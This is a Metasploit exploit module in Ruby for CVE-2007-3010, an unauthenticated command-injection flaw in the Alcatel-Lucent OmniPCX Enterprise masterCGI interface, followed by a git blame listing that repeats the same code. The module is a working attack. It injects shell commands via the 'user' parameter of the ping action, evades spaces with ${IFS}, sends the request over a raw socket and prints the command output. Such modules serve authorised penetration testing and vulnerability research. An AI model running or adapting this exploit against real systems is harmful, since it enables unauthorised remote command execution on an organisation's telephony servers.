metasploit-framework/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_e...

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # Only interactive single commands supported

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',
      'Description'    => %q{
          This module abuses a metacharacter injection vulnerability in the
        HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise
        Communication Server 7.1 and earlier. The Unified Maintenance Tool
        contains a 'masterCGI' binary which allows an unauthenticated attacker
        to execute arbitrary commands by specifing shell metacharaters as the
        'user' within the 'ping' action to obtain 'httpd' user access. This
        module only supports command line payloads, as the httpd process kills
        the reverse/bind shell spawn after the HTTP 200 OK response.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '40521' ],
          [ 'BID', '25694' ],
          [ 'CVE', '2007-3010' ],
          [ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic'
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 09 2007'))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ], self.class)
  end

  def exploit
    connect

    cmd = payload.encoded.gsub(" ", '${IFS}')
    req =
      "GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" +
      "Host: #{rhost}\r\n\r\n"

    print_status("Sending GET request with command line payload...")
    sock.put(req)

    res = sock.get(3,3)

    if (res =~ /<h5>(.*)<\/h5>/smi)
      out = $1
      print_line(out.gsub(/<h5>|<\/h5>/, ''))
      return
    end

    handler
    disconnect
  end

end
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ManualRanking # Only interactive single commands supported`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',`
			`'Description' => %q{`
			`This module abuses a metacharacter injection vulnerability in the`
			`HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise`
			`Communication Server 7.1 and earlier. The Unified Maintenance Tool`
			`contains a 'masterCGI' binary which allows an unauthenticated attacker`
			`to execute arbitrary commands by specifing shell metacharaters as the`
			`'user' within the 'ping' action to obtain 'httpd' user access. This`
			`module only supports command line payloads, as the httpd process kills`
			`the reverse/bind shell spawn after the HTTP 200 OK response.`
			`},`
			`'Author' => [ 'patrick' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'OSVDB', '40521' ],`
			`[ 'BID', '25694' ],`
			`[ 'CVE', '2007-3010' ],`
			`[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],`
			`],`
			`'Platform' => ['unix'],`
			`'Arch' => ARCH_CMD,`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic'`
			`}`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Automatic Target', { }]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 09 2007'))`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(443),`
			`OptBool.new('SSL', [true, 'Use SSL', true]),`
			`], self.class)`
			`end`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`cmd = payload.encoded.gsub(" ", '${IFS}')`
			`req =`
			`"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" +`
			`"Host: #{rhost}\r\n\r\n"`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Sending GET request with command line payload...")`
			`sock.put(req)`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = sock.get(3,3)`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if (res =~ /<h5>(.*)<\/h5>/smi)`
			`out = $1`
			`print_line(out.gsub(/<h5>\|<\/h5>/, ''))`
			`return`
			`end`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
Added alcatel_omnipcx_mastercgi command execution module. git-svn-id: file:///home/svn/framework3/trunk@6990 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-01 03:43:16 +00:00
			`end`